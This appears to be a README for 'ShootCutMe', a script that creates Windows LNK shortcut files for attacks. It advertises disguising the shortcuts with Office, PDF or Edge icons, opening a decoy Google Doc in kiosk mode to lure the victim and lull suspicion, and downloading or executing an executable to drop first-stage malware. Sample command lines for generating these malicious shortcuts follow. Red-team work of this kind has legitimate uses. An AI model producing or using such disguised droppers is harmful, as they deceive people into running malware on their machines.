LNK files are used on the most modern and advanced APT attacks.
LNK files are windows shortcut files. Using a shortcut file you can launch your own commands.
I am happy to introduce ShootCutMe a script to create LNK files.
Options Available For Version 0.1:
Fake pdf (Will open a fake Google doc on the browser in kiosk mode to lure the victim and remove suspicions)
You can choose between different icons (word, Adobe, Excel, PowerPoint, Edge...)
You can choose what you want to accomplish with the LNK file: download an executable, download and load an executable, execute an executable) Using the LNK file you can drop your first-stage malware and complete your red teaming engagement successfully.
python -m venv lnkenv
python -m pip install -r requirements.txt
python shootcutme.py --icon excel --name test1 -d fileNameAfterDownload.txt D:\LNKtest
python shootcutme.py --icon word --name test2 -ex exeToLaunch.exe
python shootcutme.py --icon edge --name <shotcutFileName> -fp <googleDocUrl> <executableToLaunch>
python shootcutme.py --icon pdf --name <shortCutFileName> -dl exampleTest.exe D:\LNKtest
python shootCutMe.py -n test1.pdf --icon pdf --delete